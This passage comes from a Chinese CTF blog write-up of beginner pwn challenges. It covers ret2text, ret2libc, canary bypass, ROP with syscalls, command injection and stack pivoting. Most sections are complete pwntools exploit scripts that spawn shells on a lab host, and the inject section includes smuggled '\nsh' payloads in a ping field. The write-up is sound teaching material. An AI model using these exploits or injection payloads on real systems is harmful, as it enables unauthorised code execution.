class="line">...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div><br>photo()申请了<code>0x50</code>的栈空间，<code>rbp-50h</code>,写入了<code>0x40</code>字节的数据。laker()中<code>s1</code>从<code>rbp-30h</code>开始比较，这里简单验证一下<br><div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Hey,what&#x27;s your name?!</span><br><span class="line">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxdulaker</span><br><span class="line">I will teach you a lesson.</span><br><span class="line">&gt;3</span><br><span class="line">welcome,xdulaker</span><br></pre></td></tr></table></figure></div><br>通过验证，接下来是熟悉的ret2text了。<br><div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line">context.log_level =<span class="string">&#x27;debug&#x27;</span></span><br><span class="line">elf = ELF(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">libc = ELF(<span class="string">&#x27;./libc.so.6&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># p = process(&#x27;./pwn&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&#x27;192.168.50.1&#x27;</span>,<span class="number">59868</span>)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;&gt;&#x27;</span>,<span class="string">b&#x27;1&#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;gift:&#x27;</span>)</span><br><span class="line">leak_opt = <span class="built_in">int</span>((p.recv(<span class="number">14</span>)),<span class="number">16</span>)</span><br><span class="line">pie_base=leak_opt - <span class="number">0x4010</span></span><br><span class="line">bkd=pie_base+<span class="number">0x124E</span></span><br><span class="line">log.success(<span class="built_in">hex</span>(pie_base))</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;&gt;&#x27;</span>,<span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line">payload1 = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x20</span> + <span class="string">b&#x27;xdulaker&#x27;</span></span><br><span class="line">p.sendafter(<span class="string">b&#x27;your name?!\n&#x27;</span>,payload1)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;&gt;&#x27;</span>,<span class="string">b&#x27;3&#x27;</span>)</span><br><span class="line">p.recvline()</span><br><span class="line">payload2 = <span class="string">b&#x27;a&#x27;</span>*<span class="number">48</span> + <span class="string">b&#x27;SNOWCATT&#x27;</span> + p64(bkd)</span><br><span class="line">p.sendline(payload2)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></div></p>
<h2 id="boom"><a href="#boom" class="headerlink" title="boom"></a>boom</h2><blockquote>
<p>你可以轻易爆破我们的系统，但是一个不可泄露的“canary”你又该如何应对？</p>
</blockquote>
<p>人工canary，提供了win函数，提示可以使用python的ctypes包<br>ctypes可以调用C库函数，于是使用ctypes加载libc<br>init()中有<code>v0 = time(0LL)</code>，使time=0，<br><div class="code-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">char</span> s[<span class="number">124</span>]; <span class="comment">// [rsp+0h] [rbp-90h] BYREF</span></span><br><span class="line"><span class="type">int</span> v5; <span class="comment">// [rsp+7Ch] [rbp-14h]</span></span><br><span class="line"><span class="type">int</span> v6; <span class="comment">// [rsp+8Ch] [rbp-4h]</span></span><br></pre></td></tr></table></figure></div><br>先填充0x90-0x14，再填充canary，再填充16+8</p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> ctypes</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"></span><br><span class="line">p = remote(<span class="string">&#x27;192.168.50.1&#x27;</span>, <span class="number">58472</span>)</span><br><span class="line"><span class="comment">#p=process(&#x27;./pwn&#x27;)</span></span><br><span class="line">libc = ctypes.CDLL(<span class="string">&#x27;libc.so.6&#x27;</span>)</span><br><span class="line">libc.srand(<span class="built_in">int</span>(time.time()))</span><br><span class="line">canary = libc.rand() % <span class="number">114514</span></span><br><span class="line">backdoor = <span class="number">0x401276</span></span><br><span class="line">ret = <span class="number">0x40101a</span></span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;(y/n)&#x27;</span>, <span class="string">b&#x27;y&#x27;</span>)</span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span> * <span class="number">124</span> + p32(canary) + <span class="string">b&#x27;a&#x27;</span>*<span class="number">24</span>+p64(ret)+ p64(backdoor)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;Enter your message: &#x27;</span>, payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></div>
<h2 id="boom-revenge"><a href="#boom-revenge" class="headerlink" title="boom_revenge"></a>boom_revenge</h2><p><a href="#boom">同上</a>（为什么重复几次才成功？）🤔</p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> ctypes</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line">p = remote(<span class="string">&#x27;192.168.50.1&#x27;</span>, <span class="number">62171</span>)</span><br><span class="line"><span class="comment">#p=process(&#x27;./pwn&#x27;)</span></span><br><span class="line">libc = ctypes.CDLL(<span class="string">&#x27;libc.so.6&#x27;</span>)</span><br><span class="line">libc.srand(<span class="built_in">int</span>(time.time()))</span><br><span class="line">canary = libc.rand() % <span class="number">114514</span></span><br><span class="line">backdoor = <span class="number">0x401276</span></span><br><span class="line">ret = <span class="number">0x40101a</span></span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;(y/n)&#x27;</span>, <span class="string">b&#x27;y&#x27;</span>)</span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span> * <span class="number">124</span> + p32(canary) + <span class="string">b&#x27;a&#x27;</span>*<span class="number">24</span>+p64(ret)+ p64(backdoor)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;Enter your message: &#x27;</span>, payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></div>
<h2 id="ezlibc"><a href="#ezlibc" class="headerlink" title="ezlibc"></a>ezlibc</h2><blockquote>
<p>相信做了前面题的你，已经初步开始了解我们如何利用栈溢出来控制程序的执行流程了。在这道题，你将理解动态链接与延迟绑定，这里开启了ASLR和PIE，但是，我给了你一个小礼物来应对两个防护，务必妥善保管！ 这个礼物某种情况下还会发生改变，成为另一种神兵利器，至于怎么改变，就要靠你自己去摸索了！</p>
<p>建议你利用gdb，完整的跟踪一下整个动态链接和延迟绑定的过程，这样你能更了解它究竟是怎么完成这个工作的，同时有助于你更加的了解ret2libc这种攻击。</p>
</blockquote>
<p>开启了PIE，显然可以通过read泄露PIE基址，这里注意一下延迟绑定，还需要泄露libc，于是返回泄露libc。<br>当采用动态链接以及延迟绑定之后，程序初加载的时候，并不知道诸如read等libc函数的实际加载地址，此时需要通过该机制进行解析之后，才会填入got表。即延迟绑定下 got 表初始值是 <code>plt_resolve</code> 地址<br>现在你掌握ret2libc了，以及pwntools查找libc中函数和字符串的方法。<br><div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line">elf=ELF(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">libc=ELF(<span class="string">&#x27;./libc.so.6&#x27;</span>)</span><br><span class="line">p=remote(<span class="string">&quot;192.168.50.1&quot;</span>,<span class="number">65064</span>)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">&quot;use &quot;</span>)</span><br><span class="line">leak_read=<span class="built_in">int</span>((p.recv(<span class="number">14</span>)),<span class="number">16</span>)</span><br><span class="line">pie_base=leak_read-<span class="number">0x1060</span></span><br><span class="line">start=pie_base+<span class="number">0x10c0</span></span><br><span class="line"></span><br><span class="line">payload=<span class="string">b&quot;A&quot;</span>*<span class="number">40</span>+p64(start)</span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">&quot;use &quot;</span>)</span><br><span class="line">leak_read2 = <span class="built_in">int</span>(p.recv(<span class="number">14</span>),<span class="number">16</span>)</span><br><span class="line">libc_base=leak_read2-libc.symbols[<span class="string">&#x27;read&#x27;</span>]</span><br><span class="line">system=libc_base+libc.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">bin_sh=libc_base+<span class="built_in">next</span>(libc.search(<span class="string">b&#x27;/bin/sh&#x27;</span>))</span><br><span class="line">pop_rdi=libc_base+<span class="number">0x2a3e5</span></span><br><span class="line">ret=pie_base+<span class="number">0x101a</span></span><br><span class="line">payload=<span class="string">b&quot;a&quot;</span>*<span class="number">40</span>+p64(pop_rdi)+p64(bin_sh)+p64(ret)+p64(system)</span><br><span class="line">p.send(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></div></p>
<h2 id="inject"><a href="#inject" class="headerlink" title="inject"></a>inject</h2><blockquote>
<p>一般来说 Pwn challenges 都以内存损坏漏洞为主。然而 binary 程序有很多漏洞不需要内存越界读写，开再多的保护也防不住，程序员即使换用 Rust 等内存安全语言也可能犯相同的错误。这种漏洞利用起来简单，危害可能还更大？！</p>
</blockquote>
<p>这是Rust写的吗<br>使用#注释<code>-c 4</code><br>或第一个sh执行第二个sh <code>ping sh -c sh -c 4</code><br><div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#p=process(&#x27;./pwn&#x27;)</span></span><br><span class="line">p=remote(<span class="string">&#x27;192.168.50.1&#x27;</span>, <span class="number">52971</span>)</span><br><span class="line">p.sendlineafter(<span class="string">&#x27;Your choice: &#x27;</span>,<span class="built_in">str</span>(<span class="number">4</span>))</span><br><span class="line"><span class="comment">#payload = &quot;\nsh -c sh&quot;</span></span><br><span class="line"><span class="comment">#payload=&quot;\nsh #&quot;</span></span><br><span class="line">p.sendafter(<span class="string">&#x27;Enter host to ping: &#x27;</span>,payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></div></p>
<h2 id="randomlock"><a href="#randomlock" class="headerlink" title="randomlock"></a>randomlock</h2><blockquote>
<p>诸如rand之类的函数，生成的数列虽然看起来是随机的，但实际上是由一个确定的算法产生的，因此称为“伪随机”。那么只要种子固定，我们不就可以得到固定的数列了吗？<br>当然，我这道锁的种子可是经过”真随机”与”加密”两道工序，至少看起来没那么容易破解？</p>
</blockquote>
<p>猜测seed是1<br><div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> ctypes</span><br><span class="line"></span><br><span class="line">libc = ctypes.CDLL(<span class="string">&quot;libc.so.6&quot;</span>)</span><br><span class="line">libc.srand(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">p = remote(<span class="string">&#x27;192.168.50.1&#x27;</span>,<span class="number">62581</span>)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">b&quot;&gt;&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">10</span>):</span><br><span class="line">    r = libc.rand() % <span class="number">10000</span></span><br><span class="line">    p.sendline(<span class="built_in">str</span>(r).encode())</span><br><span class="line">    <span class="keyword">if</span> i &lt; <span class="number">9</span>:</span><br><span class="line">        p.recvuntil(<span class="string">b&quot;&gt;&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(p.recvall())</span><br></pre></td></tr></table></figure></div></p>
<h2 id="syslock"><a href="#syslock" class="headerlink" title="syslock"></a>syslock</h2><blockquote>
<p>系统调用是什么？<code>system</code> 函数使用了什么系统调用来启动一个 shell 子进程？如何进行系统调用？</p>
</blockquote>
<p>很善良地提供了一些gadget，lose()中也有syscall。<br>还需要自己读进去<code>/bin/sh</code>,<br><em>注意力涣散</em>的笔者注意到了main()的逻辑是i &lt;= 4&amp;&amp;i == 59，<br><div class="code-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">i = input();</span><br><span class="line"><span class="keyword">if</span> ( i &gt; <span class="number">4</span> )</span><br><span class="line">  lose();</span><br><span class="line">write(<span class="number">1</span>, <span class="string">&quot;Input your password\n&quot;</span>, <span class="number">0x14u</span>LL);</span><br><span class="line">read(<span class="number">0</span>, (<span class="type">char</span> *)&amp;s + i, <span class="number">0xCu</span>LL);</span><br><span class="line"><span class="keyword">if</span> ( i != <span class="number">59</span> )</span><br><span class="line">  lose();</span><br><span class="line">cheat();</span><br></pre></td></tr></table></figure></div><br><em>59暗示系统调用号</em>，这里不需要直接覆盖返回地址，而是利用数组下标越界修改全局变量。<br>查看.bss段<br><code>i</code>的地址是<code>0x404080</code><br><code>s</code>的地址是<code>0x4040a0</code><br>差是0x20，也就是&amp;s+-32指向i，修改使其为59。<br>在cheat()中覆盖，注意到还没有读入<code>/bin/sh</code><br>因为没有注意到main()中能读12字节，笔者在cheat()中读入<code>/bin/sh</code>。😭😭😭<del>注意力涣散</del><br>一个查询系统调用号的网站<a class="link"   target="_blank" rel="noopener" href="https:/syscall.sh/" >https:/syscall.sh/<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a><br><div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line">elf = ELF(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line"><span class="comment"># p = process(&#x27;./pwn&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&#x27;192.168.50.1&#x27;</span>,<span class="number">54928</span>)</span><br><span class="line"></span><br><span class="line">pop_rdi_rsi_rdx = <span class="number">0x401240</span></span><br><span class="line">pop_rax = <span class="number">0x401244</span></span><br><span class="line">syscall = <span class="number">0x401230</span></span><br><span class="line">read_plt = <span class="number">0x4010A0</span></span><br><span class="line">s_addr = <span class="number">0x4040A0</span></span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;choose mode\n&#x27;</span>,<span class="string">b&#x27;-32&#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;Input your password&#x27;</span>)</span><br><span class="line">p.send(p64(<span class="number">59</span>))</span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*<span class="number">64</span></span><br><span class="line">payload += <span class="string">b&#x27;SNOWCATT&#x27;</span></span><br><span class="line">payload += p64(pop_rdi_rsi_rdx)</span><br><span class="line">payload += p64(<span class="number">0</span>) + p64(s_addr) + p64(<span class="number">8</span>)</span><br><span class="line">payload += p64(read_plt)</span><br><span class="line"></span><br><span class="line">payload += p64(pop_rdi_rsi_rdx)</span><br><span class="line">payload += p64(s_addr) + p64(<span class="number">0</span>) + p64(<span class="number">0</span>)</span><br><span class="line">payload += p64(pop_rax) + p64(<span class="number">59</span>)</span><br><span class="line">payload += p64(syscall)</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;Developer Mode.\n&#x27;</span>)</span><br><span class="line">p.send(payload)</span><br><span class="line">sleep(<span class="number">0.1</span>)</span><br><span class="line">p.send(<span class="string">b&quot;/bin/sh\x00&quot;</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></div><br>main()中read能读12字节，使用p32发送59，8字节<code>/bin/sh\x00</code>，不需要再调用<code>read</code>，这里不再给出exp。</p>
<h2 id="ezprotection"><a href="#ezprotection" class="headerlink" title="ezprotection"></a>ezprotection</h2><blockquote>
<p>你们这些 pwner，天天就想着溢出，这次我放了一只 canary 在这里，它会一直盯着你，直到永远！</p>
</blockquote>
<p>填满buf覆盖<code>\x00</code>泄露canary，循环攻击爆破canary，空间不够就使用p16<br><div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line">bkd = <span class="number">0x127D</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    <span class="comment"># p = process(&#x27;./pwn&#x27;)</span></span><br><span class="line">    p = remote(<span class="string">&#x27;192.168.50.1&#x27;</span>,<span class="number">59263</span>)</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        p.sendafter(<span class="string">b&#x27;over you.\n&#x27;</span>,<span class="string">b&#x27;A&#x27;</span>*<span class="number">25</span>)</span><br><span class="line">        p.recvuntil(<span class="string">b&#x27;A&#x27;</span>*<span class="number">25</span>)</span><br><span class="line">        canary = u64(p.recv(<span class="number">7</span>).rjust(<span class="number">8</span>, <span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">        log.success(<span class="string">f&quot;Leaked canary: <span class="subst">&#123;<span class="built_in">hex</span>(canary)&#125;</span>&quot;</span>)</span><br><span class="line"></span><br><span class="line">        payload = <span class="string">b&quot;a&quot;</span>*<span class="number">24</span> + p64(canary) + <span class="string">b&#x27;SNOWCATT&#x27;</span> + p16(bkd)</span><br><span class="line">        p.sendline(payload)</span><br><span class="line">    <span class="keyword">except</span>:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;error&quot;</span>,end=<span class="string">&#x27; &#x27;</span>)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        p.interactive()</span><br><span class="line">        <span class="keyword">continue</span></span><br></pre></td></tr></table></figure></div></p>
<h2 id="ezpivot"><a href="#ezpivot" class="headerlink" title="ezpivot"></a>ezpivot</h2><blockquote>
<p>不是每一次我们都能遇到足够长的缓冲区溢出。这一次，只能溢出一点点，那你该怎么办呢？栈迁移就是解决这个问题的一个手段，通过栈迁移我们能获得足够的栈空间，但是请注意迁移之后的栈布局。</p>
</blockquote>
<p>栈迁移的一个方法是两次<code>leave; retn</code><br>把提前布置好的rop链放到后面再执行的操作就叫做栈风水</p>
<p><code>mian()</code>中读取了一个整数<code>v4</code>，注意到<code>v4&gt;32</code>则退出，<code>introduce()</code>中会向<code>.bss</code>段的<code>desc</code>读<code>v4</code>字节。要把<code>.bss</code>伪造成一个栈，越大越好。<br><div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">lea     rax, [rbp+var_10]</span><br><span class="line">mov     rsi, rax</span><br><span class="line">lea     rax, aD           ; &quot;%d&quot;</span><br><span class="line">mov     rdi, rax</span><br><span class="line">call    ___isoc99_scanf</span><br><span class="line">...</span><br><span class="line">mov     eax, [rbp+var_10]</span><br><span class="line">cmp     eax, 20h          ; 0x20 = 32</span><br><span class="line">jle     short loc_401306  ; 如果 eax &lt;= 32 则跳转</span><br></pre></td></tr></table></figure></div><br>这里发现<code>read()</code>的参数是<code>nbytes</code>如果是一个负数，那它会被认为是一个巨大的正数。<br><div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">push    rbp</span><br><span class="line">mov     rbp, rsp</span><br><span class="line">sub     rsp, 10h</span><br><span class="line">mov     dword ptr [rbp+nbytes], edi</span><br><span class="line">mov     eax, dword ptr [rbp+nbytes]</span><br><span class="line">mov     rdx, rax        ; nbytes</span><br><span class="line">lea     rax, desc</span><br><span class="line">mov     rsi, rax        ; buf</span><br><span class="line">mov     edi, 0          ; fd</span><br><span class="line">call    _read</span><br></pre></td></tr></table></figure></div><br><code>main()</code>的末尾：<br><div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">mov     eax, cs:len_of_phonenum ;这里是0x1C = 28</span><br><span class="line">movsxd  rdx, eax                ;nbytes</span><br><span class="line">lea     rax, [rbp+buf]          ;buf</span><br><span class="line">mov     rsi, rax</span><br><span class="line">call    _read</span><br></pre></td></tr></table></figure></div><br><code>buf</code>12字节，覆盖<code>rbp</code>8字节，剩下8字节正好覆盖返回地址。<br>笔者先用<code>introduce()</code>在<code>.bss</code>段布置好rop链，再将返回地址覆盖为<code>leave; retn</code>。<br>当我们在返回地址处放一个 <code>leave; ret</code>，而之前又通过溢出修改了 <code>rbp</code> 时，程序会执行第二次 <code>leave</code>，这时 <code>rsp</code> 就会被强行拉到我们指定的 <code>.bss</code> 地址。<br><div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(arch=<span class="string">&#x27;amd64&#x27;</span>, os=<span class="string">&#x27;linux&#x27;</span>, log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">context.terminal = [<span class="string">&#x27;tmux&#x27;</span>,<span class="string">&#x27;splitw&#x27;</span>,<span class="string">&#x27;-h&#x27;</span>]</span><br><span class="line"></span><br><span class="line"><span class="comment"># p = process(&#x27;./pwn&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&#x27;192.168.50.1&#x27;</span>,<span class="number">50126</span>)</span><br><span class="line"><span class="comment"># gdb.attach(p, &#x27;b *main&#x27;)</span></span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;of your introduction.&#x27;</span>,<span class="string">b&#x27;-1&#x27;</span>)</span><br><span class="line">pop_rdi = <span class="number">0x401219</span></span><br><span class="line">system = <span class="number">0x401230</span></span><br><span class="line">desc = <span class="number">0x404060</span></span><br><span class="line">ret = <span class="number">0x40101a</span></span><br><span class="line">leave = <span class="number">0x40120f</span></span><br><span class="line">payload = <span class="string">b&#x27;/bin/sh\x00&#x27;</span> + <span class="string">b&#x27;\x00&#x27;</span>*(<span class="number">0x600</span>-<span class="number">8</span>+<span class="number">0x100</span>)  + p64(<span class="number">0x404600</span>) + p64(<span class="number">0x404600</span>)</span><br><span class="line">payload += p64(pop_rdi) + p64(<span class="number">0x404060</span>) + p64(ret) + p64(system)</span><br><span class="line">p.send(payload)</span><br><span class="line">payload1 = <span class="string">b&#x27;a&#x27;</span> * <span class="number">12</span> + p64(<span class="number">0x404660</span>-<span class="number">8</span>+<span class="number">0x100</span>+<span class="number">0x10</span>) + p64(leave)</span><br><span class="line">p.sendafter(<span class="string">b&#x27;lease tell us your phone number:&#x27;</span> , payload1)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></div></p>
<ul>
<li>地址 <code>0x404660-8+0x100+0x10</code>：首先<code>rbp</code>被赋值为这个地址，第二个<code>leave</code>时，<code>rsp</code>变为这个地址，紧接着 <code>pop rbp</code> 会让 <code>rsp + 8</code>,这样使<code>rsp</code>指向payload中pop rdi的位置。</li>
<li>填充了大量<code>\x00</code>并将ROP放在远离<code>desc</code>开头，避免后续函数调用产生的栈帧覆盖掉我们写的东西。</li>
</ul>
<blockquote>
<p>   这个题是一个栈迁移的入门题，希望新手在入门栈迁移的时候，不要用自己大脑模拟，多调试多跟踪，exp一步一步的写，然后去观察rbp以及rsp的变化，此时才能对于迁移的过程更加了然于胸，这里的坑是，首先，当system调用的时候，需要预留好栈空间，如果栈空间不足，当迁移到bss段之后，一些指令会访问或者甚至修改到只读的代码段，引起段错误，我注意到很多锤的同学，他们抬高栈的手段是硬生生输入诸如0x600个a，其实无需这么麻烦，并且太大量的输入会导致打远程的时候，出现io问题，直接玄学报错，你要注意到，read在读取的时候，是用rbp寻址的，因此当你控制了rbp之后，就可以直接任意地址写了，此时直接写到高地址即可，另一个坑的话，就是，当你迁移之后，执行system之前，一定要注意rbp的有效性，很多同学将rsp迁移过来之后，就对rbp不管不顾了，此时rbp相关的指令在访存的时候，会因为rbp是一个无效的值而引起段错误。</p>
</blockquote>
<h2 id="fmt-S"><a href="#fmt-S" class="headerlink" title="fmt_S"></a>fmt_S</h2><blockquote>
